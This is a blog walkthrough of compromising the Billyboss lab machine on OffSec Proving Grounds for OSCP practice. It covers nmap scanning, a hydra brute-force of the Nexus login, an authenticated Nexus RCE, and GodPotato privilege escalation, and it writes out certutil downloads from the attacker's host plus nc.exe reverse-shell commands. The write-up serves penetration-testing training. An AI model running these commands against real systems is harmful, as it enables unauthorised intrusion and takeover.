Proving Grounds | Billyboss

In this walkthrough, I demonstrate how I obtained complete ownership of Billyboss from OffSec Proving Grounds
In: Proving Grounds, TJ Null OSCP Practice, OSCP Prep, Attack, CTF, Windows, Medium Challenge

Nmap Results

# Nmap 7.93 scan initiated Fri May  5 17:21:11 2023 as: nmap -Pn -p- --min-rate 10000 -A -oN scan.txt 192.168.233.61
Warning: 192.168.233.61 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.233.61
Host is up (0.020s latency).
Not shown: 65428 closed tcp ports (reset), 94 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-title: BaGet
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
8081/tcp  open  http          Jetty 9.4.18.v20190429
|_http-server-header: Nexus/3.21.0-05 (OSS)
|_http-title: Nexus Repository Manager
| http-robots.txt: 2 disallowed entries 
|_/repository/ /service/
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=5/5%OT=21%CT=1%CU=35409%PV=Y%DS=3%DC=T%G=Y%TM=64557411
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=I%TS=U)OPS(O1=M54ENW8
OS:NNS%O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=8B15%RUD=G)IE(R=N)

Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-05-05T21:24:19
|_  start_date: N/A

TRACEROUTE (using port 993/tcp)
HOP RTT      ADDRESS
1   19.89 ms 192.168.45.1
2   20.27 ms 192.168.251.1
3   20.75 ms 192.168.233.61

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May  5 17:24:33 2023 -- 1 IP address (1 host up) scanned in 202.23 seconds





Service Enumeration

TCP/21

Test for anonymous login

The server says that a SSL connection is required, so I test with ftp-ssl and get an error stating that TLS connections are not required.

I also tested with some different cipher names using the -z cipher= option and kept getting the same error message.

Going to give up on this port for now.



TCP/139,445

Test for anonymous SMB login



TCP/80

80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-title: BaGet

nmap output shows BaGet running on IIS/10.0

I didn't see any exploits for BaGet in Exploit Database.



TCP/8081

8081/tcp  open  http          Jetty 9.4.18.v20190429
|_http-server-header: Nexus/3.21.0-05 (OSS)
|_http-title: Nexus Repository Manager
| http-robots.txt: 2 disallowed entries 
|_/repository/ /service/

nmap output showing Nexus Repository Manager 3.21.0-05

searchsploit nexus

Check Exploit Database for any public exploits for this service

Nexus Repository Manager - Java EL Injection RCE (Metasploit) | linux/remote/48343.rb
Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated) | java/webapps/49385.py

These two look particularly interesting

48343.rb
48343.rb

The Metasploit source code shows this exploit works on versions "up to and including 3.21.1". It does appear to require credentials, as evidenced by 49385.py. The default username in 48343.rb is admin. Google says the default password is admin123, but that doesn't appear to work. Let's see if we can find a valid login.





Credential Spraying with Hydra

First, we need to understand the login payload. So, we'll do a test login to the application first. First, open up your browser's developer tools. Next, click the Sign in button and enter some junk credentials.

We can see the server returned a HTTP 403 in response to the bad login. Let's look at the payload used to login.

The HTTP POST body sends two values in the login form to /service/rapture/sesssion — a username and a password, both base64 encoded.

So, a valid hydra command would look something like this:

# -I : ignore any restore files
# -f : stop when a login is found
# -L : username list
# -P : password list
# ^USER64^ and ^PASS64^ tells hydra to base64-encode the values
# C=/ tells hydra to establish session cookies at this URL
# F=403 tells hydra that HTTP 403 means invalid login
hydra -I -f -L usernames.txt -P passwords.txt 'http-post-form://192.168.233.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'

I tried password spraying with admin and several wordlists but was not having any luck. So I created a custom wordlist with cewl to try my luck at that.

cewl http://192.168.233.61:8081/ | grep -v CeWL > custom-wordlist.txt
cewl --lowercase http://192.168.233.61:8081/ | grep -v CeWL  >> custom-wordlist.txt

Finally, I was able to find a valid login using this custom wordlist!

hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.233.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'

Armed with a valid login, we can now perform the authenticated remote code execution attack.





Exploit

This server is running an unpatched version of Sonatype Nexus Repository Manager that is vulnerable to a remote code execution (RCE) attack. Patching to the latest version of the software will adequately mitigate this finding.

RCE Part 1: nc.exe

First, we'll host a copy of nc.exe using a Python web server on Kali and use the RCE exploit to download a copy of the binary to the target. This version of nc.exe allows us to specify the -e flag to execute a binary upon a successful TCP connection.

cp /usr/share/windows-resources/binaries/nc.exe $PWD
sudo python3 -m http.server 80

Copy the binary to the current directory and host it

URL='http://192.168.233.61:8081'
CMD='certutil.exe -urlcache -split -f http://192.168.45.5/nc.exe nc.exe'
USERNAME='nexus'
PASSWORD='nexus'

Update the exploit with the credentials and payload

File successfully transferred to the target





RCE Part 2: Reverse Shell

sudo rlwrap nc -lnvp 443

Listen on TCP/443 on Kali

CMD='.\\\\nc.exe 192.168.45.5 443 -e cmd.exe'

Update the payload, change your VPN IP as necessary





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Host Name:                 BILLYBOSS
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18362 N/A Build 18362
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          nathan
Registered Organization:   
Product ID:                00331-20472-14483-AA170
Original Install Date:     5/25/2020, 8:59:14 AM
System Boot Time:          9/30/2022, 11:40:50 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.18227214.B64.2106252220, 6/25/2021
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 315 MB
Virtual Memory: Max Size:  4,811 MB
Virtual Memory: Available: 683 MB
Virtual Memory: In Use:    4,128 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 6 Hotfix(s) Installed.
                           [01]: KB4552931
                           [02]: KB4497165
                           [03]: KB4497727
                           [04]: KB4537759
                           [05]: KB4552152
                           [06]: KB4540673
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.233.61
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Current User

USER INFORMATION
----------------

User Name        SID                                           
================ ==============================================
billyboss\nathan S-1-5-21-2389609380-2620298947-1153829925-1001


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled



Users and Groups

Local Users

User accounts for \\BILLYBOSS

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
nathan                   WDAGUtilityAccount       

Local Groups

*Access Control Assistance Operators
*Administrators
*Backup Operators
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Remote Management Users
*Replicator
*System Managed Accounts Group
*Users



Network Configurations

Interfaces

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.233.61
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.233.254

Open Ports

All open ports enumerated





Privilege Escalation

After some lengthy enumeration, I ran a Google search for the Windows build number and found this Windows 10 release history on Wikipedia. Windows 10 build 18362 translates to version 1903.

The user we are running as — nathan — has SeImpersonatePrivilege enabled, which would make this perfect candidate for a Potato attack. There's a recent Potato privilege escalation exploit that works on more recent builds of Windows, including Windows 10 1903!

Releases · BeichenDream/GodPotato
Contribute to BeichenDream/GodPotato development by creating an account on GitHub.

For this target, I opted to use the pre-compiled release binaries — GodPotato-NET4.exe — but we should really compile our own when working with sensitive targets, so we're not blindly running compiled binaries.

Just transfer the binary to the target and run the exploit:

wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe -O potato.exe
sudo python3 -m http.server

Download the exploit and host it on Kali

certutil -urlcache -split -f http://192.168.45.5/potato.exe

Download the exploit from Kali locally to the target

sudo rlwrap nc -lnvp 443

Start a listener on the chosen TCP port

.\potato.exe -cmd "C:\Users\nathan\Nexus\nexus-3.21.0-05\nc.exe 192.168.45.5 443 -e cmd.exe"

Run nc.exe with SYSTEM privileges and create a reverse shell

'whoami' output was not working, so I needed another way to prove SYSTEM ownership





Flags

User

2550ad1e907b6e7456474aafb5f836d5

Root

c955902d2a62889db4f39bcb26c9de92
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.